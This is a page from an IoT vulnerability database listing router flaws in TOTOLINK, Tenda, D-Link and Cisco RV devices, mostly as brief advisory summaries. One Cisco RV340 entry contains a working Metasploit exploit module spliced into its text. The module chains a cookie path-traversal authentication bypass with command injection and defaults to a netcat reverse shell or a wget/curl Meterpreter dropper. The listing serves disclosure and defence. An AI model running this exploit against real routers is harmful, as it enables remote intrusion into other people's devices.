VARIoT IoT vulnerabilities database

TOTOLINK A720R v4.1.5cu.470_B20200911 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. TOTOLINK A720R Contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. TOTOLINK A720R is a router device

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function formIPMacBindModify. This vulnerability allows attackers to cause a Denial of Service (DoS) via the IPMacBindRuleIP and IPMacBindRuleMac parameters

D-Link device D-Link DIR-823-Pro v1.0.2 was discovered to contain a command injection vulnerability in the function SetWLanACLSettings. This vulnerability allows attackers to execute arbitrary commands via the wl(0).(0)_maclist parameter. (DoS) It may be in a state. D-Link Dir-823-Pro is a dual-band smart wireless router from China D-Link company

TOTOLINK X5000R v9.1.0u.6118_B20201102 was discovered to contain a command injection vulnerability in the function NTPSyncWithHost. This vulnerability allows attackers to execute arbitrary commands via the parameter host_time. TOTOLINK X5000R Contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The Totolink X5000R is a router from the Chinese company Totolink

Totolink devices A3100R v4.1.2cu.5050_B20200504, A830R v5.9c.4729_B20191112, and A720R v4.1.5cu.470_B20200911 were discovered to contain command injection vulnerability in the function setNoticeCfg. This vulnerability allows attackers to execute arbitrary commands via the IpFrom parameter. Totolink device A3100R , A830R , A720R Contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. TOTOLink A3100R is a wireless router. TOTOLink A830R is a wireless dual-band router. TOTOLink A720R is a wireless router

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function formIPMacBindAdd. This vulnerability allows attackers to cause a Denial of Service (DoS) via the IPMacBindRule parameter

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the www-data user. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the configuration of the NGINX web server. When parsing the sessionid cookie, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. This access can then be used to pivot to other parts of the network. This module works on firmware versions 1.0.03.24 and below. }, 'License' => MSF_LICENSE, 'Platform' => ['linux', 'unix'], 'Author' => [ 'Biem Pham', # Vulnerability Discoveries 'Neterum', # Metasploit Module 'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb ], 'DisclosureDate' => '2021-11-02', 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'References' => [ ['CVE', '2022-20705'], # Authentication Bypass ['CVE', '2022-20707'], # Command Injection ['ZDI', '22-410'], # Authentication Bypass ['ZDI', '22-411'] # Command Injection ], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'Payload' => { 'BadChars' => '\'#' }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], 'Type' => :linux_dropper, 'Payload' => { 'BadChars' => '\'#' }, 'CmdStagerFlavor' => [ 'wget', 'curl' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'MeterpreterTryToFork' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path', '/']) ] ) end # sessionid utilized later needs to be set to length # of 16 or exploit will fail. Tested with lengths # 14-17 def generate_session_id return Rex::Text.rand_text_alphanumeric(16) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => '/upload', 'headers' => { 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id } }, 10) # A proper "upload" will trigger file creation. So the send_request_cgi call # above is an incorrect "upload" call to avoid creating a file on disk. The router will return # status code 405 Not Allowed if authentication has been bypassed by the above request. # The firmware containing this authentication bypass also contains the command injection # vulnerability that will be abused during actual exploitation. Non-vulnerable # firmware versions will respond with 403 Forbidden. if res.nil? return CheckCode::Unknown('The device did not respond to request packet.') elsif res.code == 405 return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.') elsif res.code == 403 return CheckCode::Safe('The device is not vulnerable to exploitation.') else # Catch-all return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.') end end def execute_command(cmd, _opts = {}) res = send_exploit(cmd) # Successful unix_cmd shells should not produce a response. # However if a response is returned, check the status code and return # Failure::NotVulnerable if it is 403 Forbidden. if target['Type'] == :unix_cmd && res&.code == 403 fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable') end if target['Type'] == :linux_dropper fail_with(Failure::Unreachable, 'The target did not respond') unless res fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200 begin body_json = res.get_json_document fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json rescue JSON::ParserError => e print_error("Failed: #{e.class} - #{e.message}") fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!') end end print_good('Exploit successfully executed.') end def send_exploit(cmd) filename = Rex::Text.rand_text_alphanumeric(5..12) fileparam = Rex::Text.rand_text_alphanumeric(5..12) input = Rex::Text.rand_text_alphanumeric(5..12) # sessionid utilized later needs to be set to length # of 16 or exploit will fail. Tested with lengths # 14-17 sessionid = Rex::Text.rand_text_alphanumeric(16) filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues. pathparam = 'Configuration' destination = "'; " + cmd + ' #' multipart_form = Rex::MIME::Message.new multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"') multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"') multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"') multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"') multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"') multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename)) # Escaping "/tmp/upload/" folder that does not contain any other permanent files send_request_cgi({ 'method' => 'POST', 'uri' => '/upload', 'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}", 'headers' => { 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid }, 'data' => multipart_form.to_s }, 10) end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager(linemax: 120) end end end

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function formAddDhcpBindRule. This vulnerability allows attackers to cause a Denial of Service (DoS) via the addDhcpRules parameter

Tenda AX3 v16.03.12.10_CN was discovered to contain a heap overflow in the function GetParentControlInfo. This vulnerability allows attackers to cause a Denial of Service (DoS) via the mac parameter. Tenda AX3 Exists in an out-of-bounds write vulnerability.Service operation interruption (DoS) It may be in a state. Tenda Ax3 is an Ax1800 Gigabit port dual-band Wifi 6 wireless router from Tenda, China

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function saveParentControlInfo. This vulnerability allows attackers to cause a Denial of Service (DoS) via the time parameter. Tenda AX3 Exists in an out-of-bounds write vulnerability.Service operation interruption (DoS) It may be in a state. Tenda Ax3 is an Ax1800 Gigabit port dual-band Wifi 6 wireless router from Tenda, China

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco RV Dual WAN Gigabit VPN router Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetQvlanList. This vulnerability allows attackers to execute arbitrary commands via the qvlanIP parameter. (DoS) It may be in a state

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetDMZ. This vulnerability allows attackers to execute arbitrary commands via the dmzHost1 parameter. (DoS) It may be in a state

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formSetMacFilterCfg. This vulnerability allows attackers to cause a Denial of Service (DoS) via the deviceList parameter. Tenda AX3 Exists in an out-of-bounds write vulnerability.Service operation interruption (DoS) It may be in a state. Tenda Ax3 is an Ax1800 Gigabit port dual-band Wifi 6 wireless router from Tenda, China

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formSetVirtualSer. This vulnerability allows attackers to cause a Denial of Service (DoS) via the list parameter. Tenda AX3 Exists in an out-of-bounds write vulnerability.Service operation interruption (DoS) It may be in a state. Tenda Ax3 is an Ax1800 Gigabit port dual-band Wifi 6 wireless router from Tenda, China

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formSetDeviceName. This vulnerability allows attackers to cause a Denial of Service (DoS) via the devName parameter. Tenda AX3 Exists in an out-of-bounds write vulnerability.Service operation interruption (DoS) It may be in a state. Tenda Ax3 is an Ax1800 Gigabit port dual-band Wifi 6 wireless router from Tenda, China

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formAddMacfilterRule. This vulnerability allows attackers to cause a Denial of Service (DoS) via the devName parameter. Tenda AX3 Exists in an out-of-bounds write vulnerability.Service operation interruption (DoS) It may be in a state. Tenda Ax3 is an Ax1800 Gigabit port dual-band Wifi 6 wireless router from Tenda, China

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function formSetSysTime. This vulnerability allows attackers to cause a Denial of Service (DoS) via the manualTime parameter

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formSetRebootTimer. This vulnerability allows attackers to cause a Denial of Service (DoS) via the rebootTime parameter. Tenda AX3 Exists in an out-of-bounds write vulnerability.Service operation interruption (DoS) It may be in a state. Tenda Ax3 is an Ax1800 Gigabit port dual-band Wifi 6 wireless router from Tenda, China

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function formSetVirtualSer. This vulnerability allows attackers to cause a Denial of Service (DoS) via the DnsHijackRule parameter